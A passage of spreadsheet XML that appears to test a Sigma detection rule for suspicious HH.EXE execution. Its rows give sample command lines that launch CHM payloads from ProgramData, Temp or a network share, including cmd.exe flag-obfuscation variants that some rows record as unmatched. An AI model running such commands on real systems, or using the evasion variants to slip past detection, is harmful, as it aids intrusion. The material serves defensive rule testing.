    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B101" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C101" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D101" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E101" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I101" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J101" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K101" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B102" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C102" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D102" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E102" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I102" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J102" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K102" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B103" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C103" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D103" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E103" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I103" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J103" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K103" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B104" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C104" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D104" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E104" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J104" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K104" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B105" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C105" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D105" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E105" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I105" s="43" t="n"/>
      <c r="J105" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K105" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B106" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C106" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D106" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E106" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I106" s="43" t="n"/>
      <c r="J106" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K106" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B107" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C107" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D107" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E107" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J107" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K107" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B108" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C108" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D108" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E108" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J108" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K108" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B109" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C109" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D109" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E109" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J109" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K109" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B110" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C110" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D110" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E110" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I110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10" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K110" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B111" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C111" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D111" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E111" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H111" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I111" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J111" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B112" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C112" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D112" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E112" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I112" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J112" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K112" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B113" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C113" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D113" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E113" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I113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13" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K113" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B114" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C114" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D114" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E114" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I114" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J114" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K114" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B115" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C115" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D115" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E115" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I115" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J115" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K115" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B116" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C116" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D116" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E116" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I116" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J116" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K116" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B117" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C117" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D117" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E117" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H117" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I117" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J117" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K117" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="118" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B118" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C118" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D118" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E118" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I118" s="43" t="n"/>
      <c r="J118" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K118" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B119" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C119" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D119" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E119" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I119" s="43" t="n"/>
      <c r="J119" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K119" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B120" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C120" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D120" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E120" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I120" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J120" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K120" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B121" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C121" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D121" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E121" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I121" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J121" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K121" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B122" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C122" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D122" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E122" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I122" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J122" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K122" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B123" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C123" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D123" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E123" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I123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23" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K123" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B124" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C124" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D124" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E124" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I124" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J124" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K124" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B125" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C125" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D125" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E125" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I125" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J125" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K125" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B126" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C126" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D126" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E126" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I126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26" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K126" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B127" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C127" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D127" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E127" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I127" s="44" t="inlineStr">
        <is>
